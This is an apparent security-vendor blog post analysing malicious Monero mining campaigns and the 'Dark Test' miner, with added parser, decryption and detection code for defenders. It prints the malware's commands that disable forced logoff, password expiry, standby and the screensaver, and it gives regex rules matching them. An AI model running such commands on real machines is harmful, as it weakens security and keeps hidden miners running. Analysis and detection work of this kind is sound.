To put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat) could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could theoretically be leveraged to generate more than $100 million per year. It is important to note that due to the volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing.

This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially:

* The value of many cryptocurrencies is skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.
* These attacks are much stealthier than their predecessors.
Attackers are not stealing anything more than computing power from their victims, and the mining software isn't technically malware, so theoretically the victims could remain part of the adversary's botnet for as long as the attacker chooses.
* Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers – sitting on this currency until it hits such a point where the attacker decides to cash in.

## Introduction

Throughout the past couple of years ransomware has dominated the threat landscape, and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks, the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns.

Over the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and "blockchain" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining, and adversaries are obviously paying attention.

## What is 'Mining'?

At a high level, mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining, let's address the currencies that make sense to mine.

Bitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR), and adversaries have done their research. In addition, Monero is extremely privacy conscious, and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with a heavy emphasis on privacy may become a safe haven for threat actors.

There are two ways that mining can be performed: either with a stand-alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems, resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers, as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise.
This is similar to launching Distributed Denial of Service (DDoS) attacks, where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic.

## How does pool based mining work?

Pool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensure that the coin mined by the pool that is associated with a particular Worker ID is delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following:

1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.
2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful, as it allows for a better understanding of the earning potential for these malicious mining pools.

These miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below (note that there are variations in the parameter names used based on the specific mining software being used):

[Example Command Line Syntax](<https://2.bp.blogspot.com/-ZmEzpdA1pzU/WnG17Z6ncAI/AAAAAAAAAkM/v_-jqvA3Tx4v4Ifg6PSTn6xHAxs92brwgCLcBGAs/s1600/image7.png>)

As you can see, there are two primary argument values required: the URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool, which is used to manage how payouts are conducted.
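
Because the pool URL and Worker ID are the two values every pool miner must carry on its command line, they are also the fields a defender can pull out of process-creation telemetry to spot a miner and attribute it to a pool account. The following is an added example of such a parser, not code from the post; the flag spellings follow XMRig's conventions (-o/--url, -u/--user, -p/--pass, -t/--threads, --max-cpu-usage, --donate-level), other miners name them differently, and the command lines it is run over are constructed with placeholder pool hosts and Worker IDs. It goes slightly beyond the two required values by also noting whether any resource-limiting flags were set.

```python
"""Pull the pool URL and Worker ID out of a miner command line.
Added example, not code from the post. Flag spellings follow XMRig's
conventions (-o/--url, -u/--user, -p/--pass, -t/--threads, --max-cpu-usage,
--donate-level); other miners name them differently."""
import re
import shlex

# host:port, optionally prefixed with the Stratum scheme most pools use
POOL_URL = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?([A-Za-z0-9.\-]+):(\d{2,5})$")

# flag -> field name; the throttling flags are the ones attackers set so
# the victim does not notice the load
MINER_FLAGS = {
    "-o": "pool", "--url": "pool",
    "-u": "worker_id", "--user": "worker_id",
    "-p": "password", "--pass": "password",
    "-t": "threads", "--threads": "threads",
    "--max-cpu-usage": "max_cpu_usage",
    "--donate-level": "donate_level",
}
THROTTLE_FIELDS = ("threads", "max_cpu_usage")


def parse_miner_cmdline(cmdline):
    """Return the miner fields found in a command line, or None when it does
    not carry both a pool URL and a Worker ID (the two values a pool needs)."""
    try:
        argv = shlex.split(cmdline)  # POSIX quoting; argv[0] is never used
    except ValueError:
        return None
    fields = {}
    i = 1
    while i < len(argv):
        name, has_eq, value = argv[i].partition("=")
        if name in MINER_FLAGS:
            if not has_eq:                 # "--flag value" form
                if i + 1 >= len(argv):
                    break
                i += 1
                value = argv[i]
            fields[MINER_FLAGS[name]] = value
        i += 1
    match = POOL_URL.match(fields.get("pool", ""))
    if not match or "worker_id" not in fields:
        return None
    fields["pool_host"] = match.group(1)
    fields["pool_port"] = int(match.group(2))
    fields["throttled"] = any(f in fields for f in THROTTLE_FIELDS)
    return fields


def find_miners(cmdlines):
    """Run the parser over process command lines (e.g. from process-creation
    telemetry) and keep the ones that look like pool miners."""
    hits = []
    for cmdline in cmdlines:
        parsed = parse_miner_cmdline(cmdline)
        if parsed:
            hits.append(parsed)
    return hits


# Constructed sample command lines; placeholder pool hosts and Worker IDs.
SAMPLE_CMDLINES = [
    "C:\\Users\\victim\\AppData\\Roaming\\svchost.exe -o stratum+tcp://pool.example.invalid:3333 "
    "-u 4PLACEHOLDERWALLET.worker1 -p x -t 2 --max-cpu-usage=50 --donate-level 1",
    "notepad.exe C:\\Users\\victim\\notes.txt",
    "/tmp/java -o pool.example.invalid:45700 -u operator@example.invalid -p x",
]

if __name__ == "__main__":
    for hit in find_miners(SAMPLE_CMDLINES):
        state = "throttled" if hit["throttled"] else "unthrottled"
        print(hit["pool_host"], hit["pool_port"], hit["worker_id"], state)
```

The Worker ID recovered this way is what lets an analyst look up the pool's public statistics page for that account, which is how the figures later in this post were obtained.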
However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems, as no computing resource limits are enforced. These options include:

* Limits on CPU usage.
* Limits on system temperature.
* Number of cores being used.
* Sleep periods.

Each mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor, specifying the arguments to use).

## Origins on the Underground

Talos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016, and the interest has been steadily building since that time.

From a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split, with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied by a learning curve associated with mining, including a better understanding of how much coin can be mined and the opportune times to conduct the mining activity.
As far as the malware that can be used to conduct mining, most of it is written in C# or C++, and as is common on these forums it is advertised with a low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis.

In general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them.

## Malicious Mining

Malicious mining is the focus of this post since it's an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities, and malicious mining is quickly becoming a cash cow for the bad guys.

Over the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective, and with good reason. It is an extremely profitable business model, as we've shown through our Angler Exploit Kit [research](<https://www.talosintelligence.com/angler-exposed/>), where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention, and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system.

Adversaries are left with an interesting decision: continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink, or begin leveraging other payloads. There is no shortage of options available to bad guys, including banking trojans, bots, credential stealers, and click-fraud malware to name a few.

So why choose crypto mining software?

There are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands-off infection to manage. Once a system has a miner dropped on it and starts mining, nothing else is needed from an adversary perspective. There isn't any command and control activity, and it generates revenue consistently until it's removed. So if an adversary notices a drop-off in nodes mining to their pool, it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding under the user's purview for as long as possible. The longer the user doesn't notice the miner running, the larger the potential payout for the activity.

The biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners, attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware, and attackers receive all the benefits of the mined coin.

Let's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier, the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second.
One system alone, without any hardware or electricity cost, would generate about $0.25 of Monero a day, which doesn't seem like a lot, but when you start pooling systems the earning potential increases rapidly.

Some of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably, to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post, we have seen malicious pools that far exceed the 125 KH/s necessary to generate this type of revenue.

In one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the below screenshot, the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero.

[Worker ID Statistics](<https://3.bp.blogspot.com/-MG_1-PGHnRc/WnG2S4DYdCI/AAAAAAAAAkQ/wm5t4BG-cyQT8H5R0SvXpiTP-vQ0i2CKQCLcBGAs/s1600/image21.png>)

In a series of attacks that we observed that began at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software.

[Historical Hash Rate](<https://4.bp.blogspot.com/-M5-8y8Fx7Yo/WnG2YgVvaQI/AAAAAAAAAkU/ZVgb1EDHpsERm40rt653hTMYUH1Qvh51ACLcBGAs/s1600/image31.png>)

In analyzing the size and scope of this campaign, we observed that shortly after these attacks began, the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s.

[Current Hash Rate](<https://3.bp.blogspot.com/-pjStDnu5oE8/WnG2d2dGbvI/AAAAAAAAAkY/Rxy4y24ajzQfDgPsl0EfQA9VeuZ5BDQegCLcBGAs/s1600/image11.png>)

We used an online calculator that takes hash rate, power consumption and cost and then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers.

Analyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884.

[Worker ID Payment History](<https://2.bp.blogspot.com/-cBKLUb4FJsY/WnG2jRgOLaI/AAAAAAAAAkc/vkIhD0cKfXUcw-bRIzTnENRE5fY7kDHTACLcBGAs/s1600/image5.png>)

While analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach.

[High Volume Calculations](<https://3.bp.blogspot.com/-iFc7bTVYL4I/WnG3Ofd1fiI/AAAAAAAAAkw/OW1LuQqLbnYWaFFq3VVfkq-rxkwbhPc4ACLcBGAs/s1600/table.png>)

One additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year, from $13 in January 2017 to over $300 at the time of this article, and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value, which in turn increases the amount of revenue generated.
That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting onto systems in the first place?

## Threats Delivering Miners

Cryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and direct exploitation.

### Email Based

There are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. These infections typically work as follows: a user is sent an email with an attachment, usually an archive containing a Word document that downloads the miner via a malicious macro, or an archive that unpacks a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the included binary is a widely distributed Monero miner executed with the miscreants' worker ID and pool, allowing the attackers to reap the mining benefits.

Below is an example, from late 2017, of one of these campaigns. It is a job application spoof that includes a Word document purporting to be the resume of a potential candidate.

![Example Malicious Email](https://3.bp.blogspot.com/-HN1jDjRs9NA/WnG3ofsv07I/AAAAAAAAAk0/4X5qS3uMf18a-Kp7PAKUc-glbFynIHzSQCLcBGAs/s1600/image24.png)

As you can see, the email contains a Word document which, when opened, looks like the following.

![Example Word Document](https://2.bp.blogspot.com/-YCNN3stnTLI/WnG3utpzHHI/AAAAAAAAAk4/cCbjw9yYuCgHf0Q5TZgqKlXA6OBCPxb_ACLcBGAs/s1600/image4.png)

As is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used.
This image entices the user to enable macro content within the document, which is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros via the Document_Open function:

![Highly Obfuscated VBA Macros Using Document_Open()](https://4.bp.blogspot.com/-dyl8BOtHiUE/WnG303uF5iI/AAAAAAAAAk8/B-VcgP43bnU3nMYcTAfcxrp_IwAxif2ewCLcBGAs/s1600/image22.png)

The macro leads to a call to a Shell command:

![Highly Obfuscated VBA Macro VBA.Shell Call](https://1.bp.blogspot.com/-XOkkw3a6yUE/WnG4AVkCURI/AAAAAAAAAlA/VrDifm1A5oovDdn32WTa6HO76vUcmQJtQCLcBGAs/s1600/image32.png)

We can see what this command executes after de-obfuscating it by passing its first parameter to a MsgBox call instead of Shell:

![MsgBox for Shell Replacement](https://2.bp.blogspot.com/--COaPZAv6Ew/WnG4LxL9dfI/AAAAAAAAAlE/GYytdgVpwOsm3yOL6Zh-z_UQAvlPFI6AQCLcBGAs/s1600/image30.png)

This retrieves an executable remotely using System.Net.WebClient and executes it using Start-Process. This can also be seen through the dynamic activity in Threat Grid:

![Office Document Launches a Powershell Indicator in Threat Grid](https://2.bp.blogspot.com/-mmTPAo0x4MQ/WnG4WK_-dTI/AAAAAAAAAlQ/J_DdWb9W-BsYAda0piFe3P56gM_gGVrTQCLcBGAs/s1600/image10.png)

We also identify that the downloaded binary attempts to masquerade itself through its use of an image file extension:

![Portable Executable Image Extension Identification Threat Grid](https://2.bp.blogspot.com/-YzD2ro54GK0/WnG5aJkJG5I/AAAAAAAAAlg/0ehj3iBDLigETrSyPdQvkcM7NJB5qr7OwCLcBGAs/s1600/image19.png)

In this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner.
This activity can be seen dynamically within Threat Grid:

![xmrig Execution in Threat Grid](https://3.bp.blogspot.com/-oAAn84JRp6M/WnG5k-T3a2I/AAAAAAAAAlk/RrVDgGKgj90yTIzm_Bap_fG6o9T89qdgwCLcBGAs/s1600/image20.png)

Dynamic miner activity can also be observed within the AMP for Endpoints product line. An example can be seen below within the portal's Device Trajectory:

![Dynamic Miner Execution in AMP for Endpoint's Device Trajectory](https://1.bp.blogspot.com/-AniIUgZrSrA/WnG5ui4mMwI/AAAAAAAAAlo/SgG7inliyH8OQPc9WLo_oug-1ct2g04dwCLcBGAs/s1600/image13.png)

Mining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments:

![Mining Traffic Classification using Cognitive Threat Analytics](https://4.bp.blogspot.com/-TJimRD6275k/WnG53Hz4rCI/AAAAAAAAAls/8Ahjkqr-spA-ffuY1RQ0SWRpZ2dkQnDegCLcBGAs/s1600/image12.png)

### Dark Test Cryptomining Malware

Dark Test (the name is taken from the decompiled source code) is an example of cryptomining malware written in C# that drops a UPX-packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language), which can be decompiled back into source code. The C# code is highly obfuscated, with an encrypted resource section holding all referenced strings, and functions that are resolved at runtime. The following sections discuss these techniques in detail.

### Dark Test Obfuscation

Dark Test makes use of a packer which, after unpacking, creates a suspended copy of itself using CreateProcessA and overwrites that process in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping from the address in lpBuffer up to nSize bytes.
Dark Test contains highly obfuscated C# code made up of a large number of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations whose result is the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer:

![Dynamic Method Resolution Using metadataToken Integer](https://2.bp.blogspot.com/-FW3xpQMFWTQ/WnG5_oHjZ7I/AAAAAAAAAlw/BiZn3XD0hlwNOu4QsRcNJPWt6FsOLshjwCLcBGAs/s1600/image29.png)

Functions are also called indirectly using the calli instruction, which is passed a pointer to the entry point of a function along with its parameters:

![Runtime Resolved Function Calls using calli](https://4.bp.blogspot.com/-BxKE4FUS_xo/WnG6HeOmbpI/AAAAAAAAAl0/iH44lM8q1Wo8CMZE61rxRgNrfLeUs_IeQCLcBGAs/s1600/image6.png)

The decryption function takes three integer parameters. The first two make up the seek offset of the entry holding the length and offset of the string to be decrypted, and the third is the XOR key for the string at that offset:

![Dark Test String Decryption Function](https://2.bp.blogspot.com/-5fAlSxHtsCs/WnG6PTD63ZI/AAAAAAAAAl8/WSBazviqxpMRnVke6nqudB0XZFWbrfDGgCLcBGAs/s1600/image27.png)

At the calculated offset, the first four bytes are the offset of the ciphertext and the next four are the length of the string being decrypted. The function then iterates over this length in an XOR loop to decrypt the string at that offset.
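As an added illustration (not Dark Test's own code, nor code from the post), the Ruby below models the string-table layout just described with a constructed resource blob, decrypts an entry from the two seek halves and the key, and shows what key recovery by ASCII-range filtering returns when the key is unknown; the blob contents, keys and helper names are assumptions.

```ruby
# Added example: a model of the Dark Test string table described above.
# Constructed data and helper names; not the malware's code.

# Build a resource blob: a table of [ciphertext offset (u32 LE), length (u32 LE)]
# entries followed by the single-byte-XOR-encrypted strings themselves.
def build_resource(strings_with_keys)
  table = "".b
  ciphertexts = "".b
  table_size = strings_with_keys.length * 8
  strings_with_keys.each do |plain, key|
    table << [table_size + ciphertexts.bytesize, plain.bytesize].pack("VV")
    ciphertexts << plain.bytes.map { |c| c ^ key }.pack("C*")
  end
  table + ciphertexts
end

# Mirrors the decryption routine: the two seek halves are summed to locate the
# table entry, the third parameter is the XOR key. Returns nil when the entry or
# the ciphertext it points to lies outside the blob.
def decrypt_string(blob, seek_a, seek_b, key)
  seek = seek_a + seek_b
  return nil if seek < 0 || seek + 8 > blob.bytesize
  offset, length = blob.byteslice(seek, 8).unpack("VV")
  return nil if offset + length > blob.bytesize
  blob.byteslice(offset, length).bytes.map { |c| c ^ key }.pack("C*")
end

# Key recovery when the key is unknown: every key whose output is all printable
# ASCII is a candidate, so short strings typically yield several and need review.
def recover_keys(blob, seek)
  offset, length = blob.byteslice(seek, 8).unpack("VV")
  ct = blob.byteslice(offset, length).bytes
  (0..0xFF).select { |k| ct.all? { |c| (k ^ c).between?(0x20, 0x7E) } }
           .map { |k| [k, ct.map { |c| k ^ c }.pack("C*")] }
end

if __FILE__ == $PROGRAM_NAME
  # Strings from the post; the keys are arbitrary choices for the constructed blob
  blob = build_resource([["-o pool.minexmr.com:4444 -u", 0x5A], ["taskmgr", 0x17]])
  puts decrypt_string(blob, 3, -3, 0x5A)
  recover_keys(blob, 8).each { |k, s| puts format("candidate key 0x%02x -> %s", k, s) }
end
```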
These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects:

![Dark Test String Decryption Function Call](https://3.bp.blogspot.com/-QHHC8NNpqhs/WnG6WuFY_3I/AAAAAAAAAmE/vyUgwV2z5egBm1veQbHpnJzX2_YsHa4agCLcBGAs/s1600/image17.png)

The result in this case is the string "-o pool.minexmr.com:4444 -u", which is the domain and port combination for the mining pool the miner participates in, followed by the username parameter without a value. Although these strings are decrypted at runtime, they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use):

![Dynamic Miner Activity Command Line Arguments](https://3.bp.blogspot.com/-Bnn3A7ixXqo/WnG6dckoDWI/AAAAAAAAAmI/TmyF9F_Qr5Ms7ycfr9SXEoE4p9N68VaCgCLcBGAs/s1600/image2.png)

Runtime-resolved objects and functions make it difficult to extract all strings, as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis due to different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal), [106, 242, 28], for each length. The result is that we can search for these bytes (being the first three of the length calculation) to find runtime-calculated offsets.
Once we know the length, we can glean the ciphertext offset from the preceding four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking that the result falls within valid ASCII ranges:

```ruby
#!/usr/bin/ruby
# Egg-hunt the Dark Test resource section for runtime-calculated string
# lengths and offsets, then brute-force the single-byte XOR key of each string.
fb = File.binread(ARGV[0]).bytes

# The egg is preceded by one length byte, and the four bytes before that hold
# the seek offset, so scanning starts at index 5 to avoid wrapping to the end.
(5..fb.length - 4).each do |i|
  # Through their obfuscation technique we get an egg for obfuscated string
  # lengths and offsets to find in the resource
  next unless fb[i] == 106 && fb[i + 1] == 242 && fb[i + 2] == 28

  # Perform their arithmetic with the provided bytes as a little-endian 32-bit int
  length = ([fb[i - 1], 106, 242, 28].pack("C*").unpack1("V") - 5) ^ 485648943
  seek_offset_bytes = fb[i - 5, 4]
  seek_offset = (seek_offset_bytes.pack("C*").unpack1("V") ^ 2100157544) - 100
  puts "Found length of: #{length}"
  puts "Seek offset bytes: #{seek_offset_bytes.inspect}"

  # Skip entries whose decoded offset and length do not fit inside the file
  next if length < 3 || seek_offset < 0 || seek_offset + length > fb.length

  ciphertext = fb[seek_offset, length]
  (0x00..0xFF).each do |x|
    result = ciphertext.map { |c| x ^ c }
    # Only keep keys that yield printable ASCII for every byte
    next unless result.all? { |b| b.between?(0x20, 0x7E) }
    puts "Found possible XOR key for string: #{result.pack("C*")} of length: #{length}"
  end
end
```

This brute-force approach produces some invalid results, but it also yields clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining:

    /C net accounts /forcelogoff:no

This prevents forced logoffs by remote administrators.

    /C net accounts /maxpwage:unlimited

This sets the maximum password age to unlimited, which in turn prevents password expiry.
    /C powercfg /x /standby-timeout-ac 0

This prevents the computer from entering standby mode, so mining continues while the computer is idle.

    /C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f

This prevents the screensaver from starting.

Further observed strings are those used for anti-analysis:

    procexp
    PROCEXP
    pROCESShACKER
    ProcessHacker
    procexp64
    Detect detector!
    Clear!
    taskmgr

### Dark Test Network traffic

Two GET requests are sent to api.ipfy.org, used for public IP address identification. This is followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations for two executable files: bz.exe and cpu.zip.

![Dynamic Miner Activity Command Line Arguments](https://3.bp.blogspot.com/-Qc4_UEtvGbQ/WnG6t_zCEDI/AAAAAAAAAmU/Tbbi2yeKVKkhvIOmytvbMe3huDcz2cZJwCLcBGAs/s1600/image18.png)

Oddly enough, this is not a valid .onion address and is likely a placeholder returned by the server for this dropper, or a kiddie set this up without replacing what the gateway returns to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands, with Russian comments, for setting up a database with these domains:

![Pastebin SQL Commands](https://1.bp.blogspot.com/-8Tjmvd6M01E/WnG61VY3rZI/AAAAAAAAAmc/jUfzdPmMu38oApQ9rKvbqIutNJdpdgttQCLcBGAs/s1600/image33.png)

This further implies the possibility of a builder or distributed gateway being used.
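As an added example (not from the post or from any Cisco product), the Ruby below turns the Dark Test hardening commands listed above and the xmrig-style pool argument into detection rules and runs them over constructed process-creation log lines; the `host|image|commandline` format, the host names, the cpu.exe path and the wallet placeholder are assumptions.

```ruby
# Added example: detection rules for the Dark Test hardening commands and the
# xmrig-style pool argument, run over constructed process-creation log lines.
# The "host|image|commandline" log format and the host names are assumed.

MINER_HARDENING_RULES = {
  "forced-logoff disabled"   => /\bnet(?:1)?(?:\.exe)?\s+accounts\b.*\/forcelogoff:no\b/i,
  "password expiry disabled" => /\bnet(?:1)?(?:\.exe)?\s+accounts\b.*\/maxpwage:unlimited\b/i,
  "standby disabled"         => /\bpowercfg(?:\.exe)?\b.*\/standby-timeout-ac\s+0\b/i,
  "screensaver disabled"     => /\breg(?:\.exe)?\s+add\b.*\\Control Panel\\Desktop.*\bScreenSaveTimeOut\b/i,
  # "-o host:port ... -u <wallet>" as seen in the decrypted Dark Test string
  "miner pool argument"      => /(?:^|\s)-o\s+[\w.\-]+:\d{2,5}\b.*\s-u\s+\S/i,
}.freeze

LogEvent = Struct.new(:host, :image, :cmdline)

# One log line -> LogEvent, or nil for lines that do not carry all three fields
def parse_event(line)
  host, image, cmdline = line.chomp.split("|", 3)
  return nil if cmdline.nil? || cmdline.empty?
  LogEvent.new(host.strip, image.strip, cmdline.strip)
end

# Labels of every rule the command line matches
def classify(event)
  MINER_HARDENING_RULES.select { |_, re| event.cmdline.match?(re) }.keys
end

# Returns {host => [rule labels]} for every host that tripped at least one rule
def scan(lines)
  findings = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    ev = parse_event(line)
    next if ev.nil?
    labels = classify(ev)
    findings[ev.host].concat(labels) unless labels.empty?
  end
  findings.transform_values(&:uniq)
end

# A host tripping two or more distinct rules is a strong dropper indicator;
# a single "net accounts" change on its own can also be legitimate administration
def high_confidence(findings)
  findings.select { |_, labels| labels.length >= 2 }.keys.sort
end

# Constructed sample log; WALLET_PLACEHOLDER stands in for a real wallet address
SAMPLE_LOG = <<~'LOG'
  WS01|C:\Windows\System32\cmd.exe|cmd /C net accounts /forcelogoff:no
  WS01|C:\Windows\System32\cmd.exe|cmd /C powercfg /x /standby-timeout-ac 0
  WS01|C:\Users\user\AppData\Local\Temp\cpu.exe|cpu.exe -o pool.minexmr.com:4444 -u WALLET_PLACEHOLDER -p x
  WS02|C:\Windows\System32\cmd.exe|cmd /C net accounts /maxpwage:unlimited
  WS03|C:\Windows\System32\notepad.exe|notepad.exe report.txt
  WS03|C:\Windows\System32\reg.exe|reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f
  malformed line without separators
LOG

if __FILE__ == $PROGRAM_NAME
  findings = scan(SAMPLE_LOG.lines)
  findings.each { |host, labels| puts "#{host}: #{labels.join(', ')}" }
  puts "high confidence: #{high_confidence(findings).join(', ')}"
end
```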
Further searches turned up a number of in-the-wild filenames which correspond to warez:

![Dark Test VirusTotal Observed in-the-wild Filenames](https://3.bp.blogspot.com/-lPM4zO7Yy-I/WnG6-j_QqsI/AAAAAAAAAmg/eb6YMKLP9m02kqcHC39H5BowbycRyZLmgCLcBGAs/s1600/image15.png)

This could indicate warez as a possible distribution vector for this malware.

### Dark Test Version 2

Throughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to the attributes shared with the first version of Dark Test, we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes its main thread. A notable difference is a more extensive list of anti-analysis strings, which are searched for using Process32FirstW:

![Anti-Analysis Strings](https://3.bp.blogspot.com/-yMVA8UyzTPM/WnG7LBRPlAI/AAAAAAAAAmk/F1xZeoz6HuQ9IfwbpwapLaZ_XfFKSbucgCLcBGAs/s1600/image14.png)

An interesting addition is vnc.exe, possibly to detect VPS or analysis systems that are accessed over VNC.

### Exploit Kit Based

